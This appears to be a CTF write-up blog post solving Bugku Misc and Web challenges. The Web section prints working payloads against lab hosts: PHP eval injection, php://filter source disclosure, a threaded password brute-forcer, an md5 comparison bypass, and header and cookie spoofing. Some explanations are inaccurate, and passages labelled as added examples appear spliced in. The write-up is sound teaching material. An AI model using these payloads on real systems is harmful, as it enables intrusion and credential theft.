Introduction

I bought these challenges from the Bugku author last October at considerable expense. Some of them are quite high quality, and I will keep adding to this post later.

Misc

Misc1

Attachment:

I found a GIF frame-splitting tool online (download link: Lanzou Cloud). After splitting the GIF into frames and looking at them closely, the frames use three key colours (red, blue and green), and after every 8 red/green lights a yellow light is shown. My guess was that this is a flag written out in binary, so I wrote a script:

```python
import os

os.chdir(r'C:\Users\Jason\Desktop\img')  # directory holding the extracted GIF frames

# Reference frames: green means 0, red means 1, yellow separates the 8-bit groups
green = open('IMG00000.bmp', 'rb').read()
red = open('IMG00002.bmp', 'rb').read()
yellow = open('IMG00016.bmp', 'rb').read()
frames = [green, red, yellow]  # index 0 = green, 1 = red, 2 = yellow

bits = ''
for i in range(1168):
    print('[+] Opening frame {}'.format(i))
    with open('IMG' + str(i).zfill(5) + '.bmp', 'rb') as f:
        frame = f.read()
    try:
        bits += str(frames.index(frame))  # index() returns the position of the matching reference
    except ValueError:
        pass  # a frame that matches none of the three references is skipped

bits = bits.replace('2', '\n')  # each yellow frame ends one 8-bit group
with open('result.txt', 'w') as f:
    f.write(bits)

# Convert each binary group to a character
flag = ''
with open('result.txt', 'r') as f:
    for line in f:
        if line.strip():
            flag += chr(int(line, 2))  # int(s, 2) parses s as base 2
print(flag)
```

Got the flag:

```text
flag{Pl34s3_p4y_4tt3nt10n_t0_tr4ff1c_s4f3ty_wh3n_y0u_4r3_0uts1d3}
```

Misc2

Attachment: 24.bmp

Downloading the image and opening it in WinHex shows that the file header is missing, but we cannot simply paste in any header, because not every BMP has the same header. To rebuild a BMP header we usually need to know the file size, the image width and height, and the bits per pixel.

BMP tutorial reference: @浅_若, BMP视频解析

File header before modification (screenshot)

File header after modification (screenshot)

| Range | Bytes | Description |
|---|---|---|
| 00-01 | 2 | 424D (fixed file-header magic) |
| 02-05 | 4 | File size in bytes (taken from the file properties); here the file is 202800 bytes, which is 31830 in hex |
| 0A-0D | 4 | Offset from the file header to the pixel data (62 for 1-bit, 118 for 16-colour, 54 for 24-bit, 1078 for 256-colour) |
| 0E-0F | 2 | Length of the info header, usually 0028 |
| 12-15 | 4 | Image width |
| 16-19 | 4 | Image height |
| 1A-1B | 2 | Number of bitmap planes, fixed value 0001 |
| 1C-1D | 4 | Bits per pixel: 01000000 for 1-bit, 04000000 for 16-colour, 08000000 for 256-colour, 18000000 for 24-bit |

After editing the header, save the file and open it with any software that can parse BMP images; I simply dragged it into the browser.
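As an added example that is not part of the original write-up: the standard 54-byte BMP header (BITMAPFILEHEADER plus BITMAPINFOHEADER) built and parsed with Python's struct module, plus a helper that enumerates the (width, height) pairs consistent with a given file size, which is the arithmetic behind filling in offsets 02-05, 12-15 and 16-19. Field names follow the Windows BMP specification; the sample dimensions are constructed.

```python
import struct

FILE_HEADER_LEN = 14   # BITMAPFILEHEADER: 'BM', size, reserved, pixel-data offset
INFO_HEADER_LEN = 40   # BITMAPINFOHEADER: biSize = 0x28, as in the table above


def palette_bytes(bpp):
    """Palette that sits between the headers and the pixels (4 bytes per entry)."""
    return (1 << bpp) * 4 if bpp <= 8 else 0   # 1-bit: 8, 4-bit: 64, 8-bit: 1024


def row_stride(width, bpp):
    """Each BMP scanline is padded to a multiple of 4 bytes."""
    return ((width * bpp + 31) // 32) * 4


def build_bmp_header(width, height, bpp):
    """Return the 54-byte header for an uncompressed, bottom-up BMP."""
    offset = FILE_HEADER_LEN + INFO_HEADER_LEN + palette_bytes(bpp)
    image_size = row_stride(width, bpp) * height
    file_size = offset + image_size
    file_header = struct.pack("<2sIHHI", b"BM", file_size, 0, 0, offset)
    info_header = struct.pack(
        "<IiiHHIIiiII",
        INFO_HEADER_LEN, width, height,
        1,            # biPlanes, always 1
        bpp,          # biBitCount
        0,            # biCompression = BI_RGB (uncompressed)
        image_size,
        2835, 2835,   # pixels per metre (72 dpi), cosmetic only
        0, 0,         # biClrUsed / biClrImportant, 0 = defaults
    )
    return file_header + info_header


def parse_bmp_header(data):
    """Decode the fields a header repair has to get right; raises on a missing magic."""
    if data[:2] != b"BM":
        raise ValueError("magic bytes 'BM' missing")
    file_size, _, _, offset = struct.unpack_from("<IHHI", data, 2)
    bi_size, width, height, planes, bpp, comp = struct.unpack_from("<IiiHHI", data, 14)
    return {"file_size": file_size, "offset": offset, "info_size": bi_size,
            "width": width, "height": height, "planes": planes,
            "bpp": bpp, "compression": comp}


def candidate_dimensions(file_size, bpp, max_width=4096):
    """All (width, height) pairs whose padded pixel data fills file_size exactly."""
    pixel_bytes = file_size - FILE_HEADER_LEN - INFO_HEADER_LEN - palette_bytes(bpp)
    found = []
    for width in range(1, max_width + 1):
        stride = row_stride(width, bpp)
        if pixel_bytes > 0 and pixel_bytes % stride == 0:
            found.append((width, pixel_bytes // stride))
    return found
```

When the file size does not leave a whole number of padded rows for any width, the header offset or the bits per pixel you assumed is wrong, or the file carries trailing data.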

Misc3

Attachment:

A JPG image. As usual, copy it into Kali first; binwalk reveals a hidden ZIP file inside it:

```text
root@kali:~/demo# binwalk Welcome_.jpg 

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
30 0x1E TIFF image data, big-endian, offset of first image directory: 8
4444 0x115C Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:dc="http://p
4900 0x1324 Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:li xml:lang="x-default">hint:</rdf:li></rdf:Alt>
52516 0xCD24 Zip archive data, at least v1.0 to extract, compressed size: 6732, uncompressed size: 6732, name: flag.rar
59264 0xE780 End of Zip archive
147852 0x2418C End of Zip archive
```

So I used binwalk -e to carve the image apart; the extraction yields a password-protected .rar archive and a 提示.jpg (hint image).

From the hint we can extract the keywords "king", "queen" and "jack of clubs", whose initials are "K", "Q" and "J". "K", "Q" and "J" in turn correspond to the digits 7, 8 and 1, so the password is probably some combination of these three digits; I just used ARCHPR to brute-force it and got the password 871.

Entering the password and extracting gives a 3.jpg; opening it in Notepad reveals a base64-encoded flag, which decodes to the real flag:

```text
flag{y0u Are a h@cker!}
```

Misc4

Attachment: zip

After downloading, add the .zip extension by hand. Extracting it gives a 哆啦A梦.jpg (Doraemon image) and a hint.txt; the contents of hint.txt are:

```text
Is the image missing something?
```

The main clue is in 哆啦A梦.jpg. Looking at it, my first thought was: Doraemon is shooting a basketball but there is no hoop? That suggests something like the image width or height has been changed. Dragging 哆啦A梦.jpg into Kali for analysis shows that a PNG image is hidden inside it, so I used foremost to carve it out, which produced an extra, incompletely displayed QR code.

Opening it in WinHex shows the dimensions are wrong and the image height needs adjusting: 257 in hex is 0101, so change the first 0101 found to 012C. That gives a complete QR code; scanning it yields a string, and base64-decoding that string

got the flag:

```text
flag{Ctf_2018_very_good}
```
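The height fix above works because the decoder draws whatever IHDR says; the byte-level caveat is that every PNG chunk carries a CRC32 over its type and payload, so a raw hex edit of the height leaves a stale IHDR CRC that strict decoders reject. Added example, not from the original write-up, that patches the height field and recomputes the CRC; make_png builds a small constructed test image, not the challenge file.

```python
import struct
import zlib

PNG_SIG = b'\x89PNG\r\n\x1a\n'


def chunk(ctype, payload):
    """Length + type + payload + CRC32 over type and payload, as the PNG spec defines."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack('>I', len(payload)) + ctype + payload + struct.pack('>I', crc)


def make_png(width, height):
    """Construct a tiny valid 8-bit greyscale PNG (constructed test input only)."""
    # each scanline: filter byte 0 followed by one grey byte per pixel
    raw = b''.join(b'\x00' + b'\x80' * width for _ in range(height))
    ihdr = struct.pack('>IIBBBBB', width, height, 8, 0, 0, 0, 0)
    return (PNG_SIG + chunk(b'IHDR', ihdr)
            + chunk(b'IDAT', zlib.compress(raw)) + chunk(b'IEND', b''))


def read_ihdr(data):
    """Return (width, height, crc_ok) for the IHDR chunk, which must come first."""
    if data[:8] != PNG_SIG or data[12:16] != b'IHDR':
        raise ValueError('not a PNG, or IHDR is not the first chunk')
    width, height = struct.unpack('>II', data[16:24])
    stored_crc = struct.unpack('>I', data[29:33])[0]
    crc_ok = stored_crc == (zlib.crc32(data[12:29]) & 0xFFFFFFFF)
    return width, height, crc_ok


def set_png_height(data, new_height):
    """Rewrite the IHDR height field and recompute the chunk CRC."""
    read_ihdr(data)  # validates the signature and chunk position first
    ihdr_payload = data[16:29]
    patched = ihdr_payload[:4] + struct.pack('>I', new_height) + ihdr_payload[8:]
    return data[:8] + chunk(b'IHDR', patched) + data[33:]
```

Whether a viewer renders a PNG with a bad IHDR CRC is viewer-specific, which is why a hex-editor fix sometimes opens in one tool and fails in another.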

Misc5

Attachment: CTF2.zip

Description: finding the key is actually simple

After extracting there is a flag folder containing 500 txt files. From the challenge description we are meant to find the key among these 500 files, so I dragged them into Kali and used strings to pull out the key:

```text
root@kali:~/demo/flag# strings * | grep key{
bkey{fe9ff627da72364a}@e`f`>"R Z*Wn
```

Misc6

Attachment: zip

Download the file and add the extension by hand. Extracting it gives a wenjian.rar and a 压缩包密码.txt (archive password file). Opening 压缩包密码.txt first, it turns out to be a base64-encoded image; restoring the image with an online tool (站长工具) reveals the extraction password:


With the password, extract wenjian.rar: it contains 159 QR code images, and the key we are after should be in one of them, but scanning them one by one by hand is out of the question. Python 2 had a zbar module dedicated to scanning QR codes; in Python 3 it is wrapped as a package called pyzbar, and as long as it works that is fine. My environment is Python 3.9 on Windows, so first install the required modules:

```shell
pip install Pillow
pip install pyzbar
```

Then write a script and run it:

```python
from PIL import Image
from pyzbar.pyzbar import decode
import os

flag = ''
os.chdir(r'C:\Users\Jason\Desktop\demo\题目\wenjian')  # directory holding the QR code images
for i in range(160):
    f = Image.open('{}.png'.format(i))
    results = decode(f)  # one entry per barcode found in the image
    for result in results:
        data = result.data.decode('utf-8')
        flag += data
print(flag)
```

It outputs a string of binary digits; converting them with an online tool gives the flag:

```text
flag{QRcode1sUseful}
```

Misc7

Attachment: stego100.wav

Tool: Cool Edit Pro

At 2 minutes 15 seconds there is a beep-beep, beep-beep sound, which is probably Morse code (of everything I have learned so far, Morse code is the only thing that gets embedded in audio). Opening the audio in Cool Edit Pro shows the Morse code as the waveform.

Write down the Morse code, decode it against a Morse code table, and the resulting string is the flag:

```text
5BC925649CB0188F52E617D70929191C
```

Web

Web1

A file-inclusion challenge. The eval() function executes the PHP code contained in a string as if it were ordinary PHP code.

```php
<?php
include "flag.php";
$a = @$_REQUEST['hello']; // $_REQUEST holds data submitted via both GET and POST
eval( "var_dump($a);"); // eval() runs the code in the string; var_dump() outputs the variable's data type and value
show_source(__FILE__);
?>
```

Construct the payload:

```text
http://192.168.176.235:1020/?hello=1);show_source("flag.php");//
```

which is equivalent to:

```php
eval("var_dump(1);show_source("flag.php");")
```

Got the flag:

```text
int(1) <?php
$flag = 'Too Young Too Simple';
# echo $flag;
# flag{ccd234c9-c022-4ce3-8a62-e56374e3324f};
?> <?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>
```

Web2

A password brute-forcing challenge.

I wrote a script for it, which needs a thread lock.

Thread locks (threading.Lock): in multithreading, threads share resources, and if several threads modify the same variable the data gets corrupted. For example: two people both want a cola, but there is only one bottle in the fridge, and the two keep arguing over it so that neither gets the cold cola. So the concept of a thread lock was introduced: a lock lets only one thread through at a time, and locking (acquire()) and unlocking (release()) are normally called in pairs. Locks come in two kinds, the mutex (Lock) and the reentrant lock (RLock); the difference is that locking a mutex more than once can cause a deadlock (also referred to as thread contention), and since we want to avoid deadlock we should prefer RLock whenever a lock has to be acquired repeatedly.

```python
import threading
import requests

lock = threading.RLock()
pass_correct = False
pwd = 0


def main():
    global pwd, pass_correct
    while True:
        if pass_correct:
            break
        # Take the next candidate under the lock so no two threads try the same one
        lock.acquire()
        password = str(pwd).zfill(5)
        pwd += 1
        lock.release()
        data = {"pwd": password}
        r = requests.post('http://192.168.1.98:1021/?yes', data=data)
        r.encoding = 'utf-8'
        if "密码不正确,请重新输入" in r.text:  # server's "wrong password" message
            print("[-] {} is incorrect".format(password))
        else:
            print('[+] The key is {}'.format(password))
            pass_correct = True


threads = [threading.Thread(target=main) for _ in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()
```

Got the flag:

```text
flag{bugku-baopo-hah}
```

Web3

Source code (the page prints "flag In the variable !" above the highlighted source):

```php
<?php

error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
    eval("var_dump($$args);"); // two levels of indirection: ${$args}
}
?>
```

Another file-inclusion vulnerability. The challenge says the flag is stored in a variable, but note that $$args is a variable variable.

I looked up variable variables online and also checked what the functions involved do:

- isset: checks whether a variable is set and not null
- preg_match: runs a regular expression match
- \w is equivalent to [A-Za-z0-9_], ^ matches the start of the string, $ matches the end of the string, and + means one or more \w

PHP stores all global variables in an array named $GLOBALS ($GLOBALS is a so-called superglobal), so the payload ?args=GLOBALS dumps all variables, the flag included. That is, with args=GLOBALS, $$args becomes $GLOBALS.

```text
payload: http://192.168.1.98:1023/?args=GLOBALS
```

Web4

This challenge mainly tests PHP stream wrappers; I remember meeting this in a competition.

About php://filter/:

Explanation: php://filter is a meta-wrapper designed to apply filters when a data stream is opened, and it reads and writes local disk files. Put simply, it can read the code out in a different form before the code is executed; it only reads, and it does not require allow_url_include to be enabled.

- php://filter/resource=<data stream to filter> (i.e. the file path)
- php://filter/read=<list of filters to apply on the read chain> (i.e. the operation to perform)

Usage:

```text
?file=php://filter/convert.base64-encode/resource=xxx.php
?file=php://filter/read/convert.base64-encode/resource=xxx.php
```

The second form has the same effect as the first. The basic principle is that php://filter base64-encodes xxx.php before it would be executed, which hides the <?php tag, so xxx.php is not run directly and its base64-encoded content is output instead.

```text
payload: http://192.168.1.98:1023/index.php?file=php://filter/read/convert.base64-encode/resource=index.php
```

Base64-decode the output to get the flag:

```text
flag{edulcni_elif_lacol_si_siht}
```

Web5

?? A free-points challenge!?

Web6

This one seems to need a POST request.

Life is short, I use Python:

```python
import requests

post_data = {'what': 'flag'}
r = requests.post('http://192.168.1.98:1025/', data=post_data)
r.encoding = 'utf-8'
print(r.text)
```

Got the flag:

```text
flagflag{bugku_get_ssseint67se}
```

Web7

This is a jother decoding challenge.

Typing in anything at random shows a misspelled word: "在". Open F12 and take a look at the source.

There I found a long string and, looking closely, realised it was jother-encoded, so I copied and pasted it straight into the console (the Chrome developer console):


Enter the result into the input box above; going by the hint, it should be converted to uppercase before entering. Heh, a noob like me actually got praised.

Submit the flag. This challenge seems to have a problem, though: by rights the answer should be "CTF{WHATFK}"; I suspect the U-disk version of this Bugku challenge is not fully configured yet. So the flag accepted in my case was the lowercase one:

```text
ctf{whatfk}
```

Web8

This challenge tests the use of scientific notation.

is_numeric() checks whether a variable is a number or a numeric string.

Explanation: the num parameter is passed via GET into $num. If $num is a number or a numeric string, the input is simply printed back; if num==1, the flag is returned. In other words, num must not be a plain number, but its value must equal 1.

Solution: scientific notation comes to mind, since it is not a plain number yet its value equals 1. Construct the payload:

```text
http://192.168.1.98:1027/?num=1e+1-9
```

Got the flag:

```text
flag{bugku-789-ps-ssdf}
```

Web9

The site keeps refreshing endlessly; my guess is that there are countless alert() calls behind it.

Disable JavaScript.

Pressing F12 shows that the site has a commented-out string of Unicode-encoded characters:

```text
&#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&#104;&#74;&#75;&#45;&#72;&#83;&#49;&#49;&#73;&#73;&#73;&#125;
```

Decode it to get the flag.

Web10

If this one isn't hard, then it's pretty easy (please ignore my nonsense).

There are two URL-encoded strings and an eval statement; URL-decode them first:

```javascript
var p1 = 'function checkSubmit(){var a=document.getElementById("password");if("undefined"!=typeof a){if("67d709b2b';
var p2 = 'aa648cf6e87a7114f1"==a.value)return!0;alert("Error");a.focus();return!1}}document.getElementById("levelQuest").onsubmit=checkSubmit;';
eval(unescape(p1) + unescape('54aa2' + p2));
```

The unescape() function decodes strings that were encoded with escape().

The part that matters is the eval: it decodes p1 and p2 and concatenates them (don't leave out '54aa2'), which yields the following string:

```text
67d709b2b54aa2aa648cf6e87a7114f1
```

Enter this string into the input box and submit it to get the flag:

```text
KEY{J22JK-HS11}
```

Web11

Only a single digit can be entered, so edit the HTML in F12 without hesitation.

Got the flag:

```text
flag{CTF-bugku-0032}
```

Web12

The page keeps flashing about, so disable JavaScript and refresh the page by hand until it looks like the screenshot above; then F12 to view the source and get the flag:

```text
flag{dummy_game_1s_s0_popular}
```

Web13

Bypass challenges like this are what I am worst at; solution reference: link

Opening the page shows a piece of ciphertext, probably an MD5 hash, but that is no use yet. Scanning with dirb turns up nothing useful... Then it occurred to me this might be a backup-file challenge. I tried it, and sure enough, I got a copy of the site's index page source:

```php
<?php


include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');
$str = substr($str,1);
$str = str_replace('key','',$str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag."取得flag";
}
?>
```

Overall, the code removes every occurrence of "key" from the two GET parameters (which can be bypassed with kekeyy), MD5-hashes the values of key1 and key2 and compares them; if the MD5 values are equal while the raw values differ, the flag is printed.

There are two ways to bypass this:

1. md5() cannot handle arrays: if it is passed an array it returns NULL, so two arrays both "hash" to NULL, which compare equal.

2. Exploit the weakness of the == comparison.

If two strings' MD5 values have the form 0exxxxx, they are treated as scientific notation, meaning 0 times 10 to the power xxxx, which is still zero, so they compare equal.

The MD5 values of the following strings all start with 0e:

```text
QNKCDZO
240610708
s878926199a
s155964671a
s214587387a
```
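As an added illustration (not from the original write-up) of the second bypass: a Python model of PHP's == on two numeric strings, applied to the MD5 digests of the strings listed above, beside the strict, constant-time comparison a hardened check would use (hash_equals in PHP). The regular expression is an approximation of PHP's numeric-string rule and is an assumption made for this demonstration.

```python
import hashlib
import hmac
import re

# Approximation of a PHP "numeric string": optional sign, digits with optional
# fraction, optional exponent. Assumption for this demonstration.
NUMERIC_RE = re.compile(r'^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$')


def php_loose_equals(a, b):
    """Model PHP's == on two strings: numeric strings are compared as numbers."""
    if NUMERIC_RE.match(a) and NUMERIC_RE.match(b):
        return float(a) == float(b)   # '0e...' becomes 0.0 whatever follows the e
    return a == b


def php_strict_equals(a, b):
    """PHP's === on two strings: byte-for-byte equality."""
    return a == b


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def vulnerable_check(key1, key2):
    """The challenge's logic: loose comparison of the two hex digests."""
    return php_loose_equals(md5_hex(key1), md5_hex(key2)) and key1 != key2


def hardened_check(key1, key2):
    """Same intent with a strict, constant-time digest comparison."""
    return hmac.compare_digest(md5_hex(key1), md5_hex(key2)) and key1 != key2
```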

I used the first method because it is a bit simpler; the second method does not seem to solve this one? Construct the payload:

```text
http://192.168.1.98:1032/?kekeyy1[]==1&kekeyy2[]==2
```

Got the flag:

```text
Bugku{OH_YOU_FIND_MY_MOMY}取得flag
```

Web14

Pressing F12 reveals a base64-encoded string 'dGVzdDEyMw==', which decodes to 'test123'. Guessing it might be the password, I tried admin / test123 and got "IP access forbidden".

Then I thought of intercepting the request with Burp and adding the request header X-Forwarded-For: 127.0.0.1 to fake a login from localhost. That got the flag.

Web15

A little cookie (biscuit) delivery system.

Register and log in; the account lacks permission, so intercept the request and look at the cookie. Apart from its prefix, the rest of the cookie is the user identity as an MD5 hash, so replace the logged-in user's MD5 with the MD5 of admin.

Got the flag:

```text
The flag is: 98112cb20fb17cc81687115010f8a5c3
```

Web16

This one mainly uses regular expressions; I used Python's re.search() method.

re.search(pattern, string, flags)

| Flag | Effect |
|---|---|
| re.I | Makes matching case-insensitive |
| re.L | Locale-aware matching |
| re.M | Multi-line matching; affects ^ and $ |
| re.S | Makes . match every character, including newlines |
| re.U | Interprets characters according to the Unicode character set; affects \w, \W, \b, \B |
| re.X | Allows a more flexible layout so the regular expression is easier to read |
```python
import re
import requests

s = requests.Session()  # Session keeps the cookies between the two requests
r = s.get("http://192.168.0.16:1035/")
searchObj = re.search(r'^<div>(.*)=\?;</div>$', r.text, re.M | re.S)
d = {
    # group(1) is the captured expression; eval() computes it
    # (note: this executes whatever the server returned)
    "value": eval(searchObj.group(1))
}
r = s.post("http://192.168.0.16:1035/", data=d)
print(r.text)
```

Done:

```text
原来你也是老司机 Bugku{YOU_DID_IT_BY_SECOND}
```

Web17

The last three challenges involve things like MD5 collisions; they are beyond me for now, so I won't post them. Next time for sure.